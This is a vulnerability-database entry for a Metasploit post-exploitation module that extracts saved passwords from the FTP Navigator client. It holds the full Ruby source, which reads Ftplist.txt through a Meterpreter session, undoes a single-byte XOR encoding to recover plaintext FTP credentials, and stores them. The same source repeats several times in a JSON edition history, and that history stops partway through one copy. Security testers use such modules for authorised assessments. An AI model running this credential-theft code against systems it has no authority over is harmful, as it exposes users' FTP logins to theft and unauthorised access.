Windows Gather FTP Navigator Saved Password Extraction
2011-10-11T05:45:03
ID MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/auxiliary/report'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
'Description' => %q{
This module extracts saved passwords from the FTP Navigator FTP client.
It will decode the saved passwords and store them in the database.
},
'License' => MSF_LICENSE,
'Author' => ['theLightCosine'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\"
val_name = "InstallLocation"
installdir = registry_getvaldata(key, val_name) || "c:\\FTP Navigator\\"
path = "#{installdir}Ftplist.txt"
begin
ftplist = client.fs.file.new(path,'r')
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Unable to open Ftplist.txt: #{e}")
print_error("FTP Navigator May not Ne Installed")
return
end
lines = ftplist.read.split("\n")
lines.each do |line|
next if line.include? "Anonymous=1"
next unless line.include? ";Password="
dpass = ""
username = ""
server = ""
port = ""
line.split(";").each do |field|
next if field.include? "SavePassword"
if field.include? "Password="
epass = split_values(field)
dpass = decode_pass(epass)
elsif field.include? "User="
username = split_values(field)
elsif field.include? "Server="
server = split_values(field)
elsif field.include? "Port="
port = split_values(field)
end
end
print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
service_data = {
address: Rex::Socket.getaddress(server),
port: port,
protocol: "tcp",
service_name: "ftp",
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: self.refname,
username: username,
private_data: dpass,
private_type: :password
}
credential_core = create_credential(credential_data.merge(service_data))
login_data = {
core: credential_core,
access_level: "User",
status: Metasploit::Model::Login::Status::UNTRIED
}
create_credential_login(login_data.merge(service_data))
end
end
def split_values(field)
values = field.split("=",2)
return values[1]
end
def decode_pass(encoded)
decoded = ""
encoded.unpack("C*").each do |achar|
decoded << (achar ^ 0x19)
end
return decoded
end
end
{"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-03-03T03:06:02", "history": [{"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/post/windows/gather/credentials/ftpnavigator", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:55:29", "history": [], "viewCount": 4, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-07-02T23:55:29", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/post/windows/gather/credentials/ftpnavigator", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:30:50", "history": [], "viewCount": 5, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-07-24T19:30:50", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:33:11", "history": [], "viewCount": 7, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-08-21T15:33:11", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-23T09:41:35", "history": [], "viewCount": 7, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-10-23T09:41:35", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-23T11:50:28", "history": [], "viewCount": 7, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-10-23T11:50:28", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-11-12T05:41:34", "history": [], "viewCount": 7, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-11-12T05:41:34", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-11-12T09:41:24", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 8.5, "modified": "2017-11-12T09:41:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2017-11-12T09:41:24", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-23T01:16:50", "history": [], "viewCount": 7, "enchantments": {"score": {"value": null, "modified": "2018-01-23T01:16:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do 